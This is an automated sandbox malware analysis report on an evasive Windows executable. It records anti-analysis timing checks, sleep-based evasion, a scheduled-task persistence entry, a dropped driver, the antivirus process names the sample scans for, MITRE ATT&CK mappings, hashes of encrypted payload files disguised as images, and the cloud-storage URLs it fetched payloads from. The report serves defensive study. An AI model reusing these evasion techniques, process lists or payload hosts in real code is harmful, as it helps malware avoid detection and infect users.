Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 140001190 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeRDTSC instruction interceptor: First address: 1400011A7 second address: 1400011A7 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F724CF2DEB0h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeWindow / User API: threadDelayed 570Jump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeWindow / User API: threadDelayed 429Jump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\hy58DJ.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-14017
Source: C:\Users\user\Documents\hy58DJ.exeAPI coverage: 2.7 %
Source: C:\Users\user\Documents\hy58DJ.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe TID: 5772Thread sleep count: 570 > 30Jump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe TID: 5772Thread sleep time: -285000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe TID: 5772Thread sleep count: 429 > 30Jump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exe TID: 5772Thread sleep time: -214500s >= -30000sJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeLast function: Thread delayed
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A45A1B8 FindFirstFileExW,5_2_00007FFE1A45A1B8
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4CA1B8 FindFirstFileExW,6_2_00007FFE1A4CA1B8
Source: C:\Users\user\Documents\hy58DJ.exeAPI call chain: ExitProcess graph end nodegraph_5-14018
Source: C:\Users\user\Documents\hy58DJ.exeAPI call chain: ExitProcess graph end nodegraph_5-14362
Source: C:\Users\user\Documents\hy58DJ.exeAPI call chain: ExitProcess graph end nodegraph_6-14018
Source: C:\Users\user\Documents\hy58DJ.exeAPI call chain: ExitProcess graph end nodegraph_6-14362
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400073E0 LdrLoadDll,5_2_00000001400073E0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,5_2_0000000140004630
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0000000140007C91
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00000001400106B0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400092E0 SetUnhandledExceptionFilter,5_2_00000001400092E0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A4576E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A4576E0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A451F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FFE1A451F50
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A452630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FFE1A452630
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4C76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFE1A4C76E0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4C1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFE1A4C1F50
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00007FFE1A4C2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFE1A4C2630

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Documents\hy58DJ.exeNtProtectVirtualMemory: Indirect: 0x29CB253Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Desktop\2o63254452-763487230.06.exeNtDelayExecution: Indirect: 0x1994D1Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeNtProtectVirtualMemory: Indirect: 0x2A9B253Jump to behavior
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00007FFE1A45FD40 cpuid 5_2_00007FFE1A45FD40
Source: C:\Users\user\Documents\hy58DJ.exeCode function: GetLocaleInfoA,5_2_000000014000F370
Source: C:\Users\user\Documents\hy58DJ.exeCode function: GetLocaleInfoA,6_2_000000014000F370
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_000000014000A370
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_0000000140005A70
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: hy58DJ.exe, 00000005.00000002.2684737412.0000000002868000.00000002.00001000.00020000.00000000.sdmp, hy58DJ.exe, 00000006.00000002.2915616742.0000000002798000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,5_2_00000001400042B0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
Source: C:\Users\user\Documents\hy58DJ.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution
24
Windows Service
1
Access Token Manipulation
31
Masquerading
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Credential API Hooking
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
DLL Side-Loading
24
Windows Service
1
Virtualization/Sandbox Evasion
LSASS Memory13
Security Software Discovery
Remote Desktop Protocol1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection
1
Access Token Manipulation
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism
1
Process Injection
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Abuse Elevation Control Mechanism
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Obfuscated Files or Information
DCSync123
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2o63254452-763487230.06.exe11%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\Documents\hy58DJ.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a8mw1y.oss-cn-beijing.aliyuncs.com
59.110.190.44
truefalse
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/i.datfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.jpgfalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/d.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/a.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/b.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/c.giffalse
    • Avira URL Cloud: safe
    unknown
    https://a8mw1y.oss-cn-beijing.aliyuncs.com/s.datfalse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.thawte.com/ThawteTimestampingCA.crl0hy58DJ.exe.0.dr, 189atohci.sys.0.drfalse
      high
      http://www.symauth.com/cps0(hy58DJ.exe.0.drfalse
        high
        http://www.symauth.com/rpa00hy58DJ.exe.0.drfalse
          high
          http://ocsp.thawte.com0hy58DJ.exe.0.dr, 189atohci.sys.0.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            59.110.190.44
            a8mw1y.oss-cn-beijing.aliyuncs.comChina
            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1586401
            Start date and time:2025-01-09 01:45:08 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 40s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:2o63254452-763487230.06.exe
            Detection:MAL
            Classification:mal80.evad.winEXE@3/12@1/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 65%
            • Number of executed functions: 12
            • Number of non-executed functions: 190
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
            • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
            • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            TimeTypeDescription
            00:47:39Task SchedulerRun new task: gWveW path: C:\Users\user\Documents\hy58DJ.exe
            19:46:00API Interceptor941x Sleep call for process: 2o63254452-763487230.06.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            59.110.190.44e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
              e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdphish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                • 47.111.150.42
                e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                • 118.178.60.9
                e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                • 59.110.190.44
                miori.m68k.elfGet hashmaliciousUnknownBrowse
                • 8.138.112.162
                sora.ppc.elfGet hashmaliciousUnknownBrowse
                • 8.151.21.103
                sora.spc.elfGet hashmaliciousMiraiBrowse
                • 120.78.217.242
                sora.arm7.elfGet hashmaliciousMiraiBrowse
                • 8.152.213.68
                sora.mips.elfGet hashmaliciousMiraiBrowse
                • 139.244.36.195
                miori.arm5.elfGet hashmaliciousUnknownBrowse
                • 59.83.20.240
                miori.spc.elfGet hashmaliciousUnknownBrowse
                • 106.14.40.50
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19https://veryfast.io/?ap=adw&as=g_d_fast_in&dm%5Bads%5D=new_static&dm%5Btype%5D=dis&gad_source=5&gclid=EAIaIQobChMIgp352NzmigMVZAOzAB0wMA8oEAEYASAAEgI_hfD_BwEGet hashmaliciousUnknownBrowse
                • 59.110.190.44
                z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 59.110.190.44
                HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 59.110.190.44
                D7VRkhOECq.exeGet hashmaliciousGuLoaderBrowse
                • 59.110.190.44
                KO0q4biYfC.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 59.110.190.44
                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 59.110.190.44
                e2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                • 59.110.190.44
                e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                • 59.110.190.44
                chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                • 59.110.190.44
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\Documents\hy58DJ.exee2664726330-76546233.05.exeGet hashmaliciousNitolBrowse
                  e2664726330-76546233.05.exeGet hashmaliciousUnknownBrowse
                    23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                      287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                        287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                          2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                            2749837485743-7684385786.05.exeGet hashmaliciousUnknownBrowse
                              2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                2b687482300.6345827638.08.exeGet hashmaliciousUnknownBrowse
                                  45631.exeGet hashmaliciousNitolBrowse
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):3892010
                                    Entropy (8bit):7.995495589600101
                                    Encrypted:true
                                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):5.3013015844763345
                                    Encrypted:false
                                    SSDEEP:6:WetLMBui9QCrztE+CrCa2BIDR6Ye89r7OdUzW9E40/qcX:2BuUQCrztEJMBIDRFgUzWg3
                                    MD5:C3BE870A726F627202B33B6AAD385CC2
                                    SHA1:CA594F5841AAEC1E2A765F4CE1FACA56DF0F3741
                                    SHA-256:F3E55A5CDCA6DB81E9FE1B1321174D057F6967382ACF98162C0DFE877AA78269
                                    SHA-512:926DFAA48EF276776143B35C188130E0FB69C6A68DB7737024AC009C3E4348C7976D464F48A11C7A7396A8CABD0EEA9420FF6AAA49657B1A790DB77E4BAF79DB
                                    Malicious:false
                                    Reputation:low
                                    Preview:....l%00Q.]Gv>i([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy.A..?w a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33R.^Du=j+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx.@..>v!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):125333
                                    Entropy (8bit):7.993522712936246
                                    Encrypted:true
                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                    Category:dropped
                                    Size (bytes):8299
                                    Entropy (8bit):7.9354275320361545
                                    Encrypted:false
                                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
